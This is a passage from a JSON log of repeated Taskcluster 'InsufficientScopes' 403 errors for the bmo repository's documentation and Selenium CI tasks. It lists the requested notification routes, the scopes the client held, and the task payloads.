\\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"IrDzAa-2SwiocjaUVKA-KA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:24.725Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:24.725Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"LIKR829ZSD6rLo8k_7bUQg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:24.725Z\\\"\\n}\\n  time:     2016-09-29T20:07:24.930Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"IrDzAa-2SwiocjaUVKA-KA\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Doc\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"docs\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"b205285d4b5904a59d53107ec8c423eb1890725d\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Documentation Build Test\",\n                        \"description\": \"Documentation Build Test\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-29T20:07:24.725Z\",\n                    \"deadline\": \"2016-09-30T20:07:24.725Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"LIKR829ZSD6rLo8k_7bUQg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-30T20:07:24.725Z\"\n                },\n                \"time\": \"2016-09-29T20:07:24.930Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"auxFJ6ZSTM6jsVzp5JF-_A\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:24.725Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:24.725Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"LIKR829ZSD6rLo8k_7bUQg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:24.725Z\\\"\\n}\\n  time:     2016-09-29T20:07:24.941Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"auxFJ6ZSTM6jsVzp5JF-_A\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:24.725Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:24.725Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"LIKR829ZSD6rLo8k_7bUQg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:24.725Z\\\"\\n}\\n  time:     2016-09-29T20:07:24.941Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"auxFJ6ZSTM6jsVzp5JF-_A\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Sel\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"selenium\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"b205285d4b5904a59d53107ec8c423eb1890725d\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/selenium_log\\\"\": {\n                                \"type\": \"file\",\n                                \"path\": \"/selenium.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Selenium Tests\",\n                        \"description\": \"Selenium Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-29T20:07:24.725Z\",\n                    \"deadline\": \"2016-09-30T20:07:24.725Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"LIKR829ZSD6rLo8k_7bUQg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-30T20:07:24.725Z\"\n                },\n                \"time\": \"2016-09-29T20:07:24.941Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": 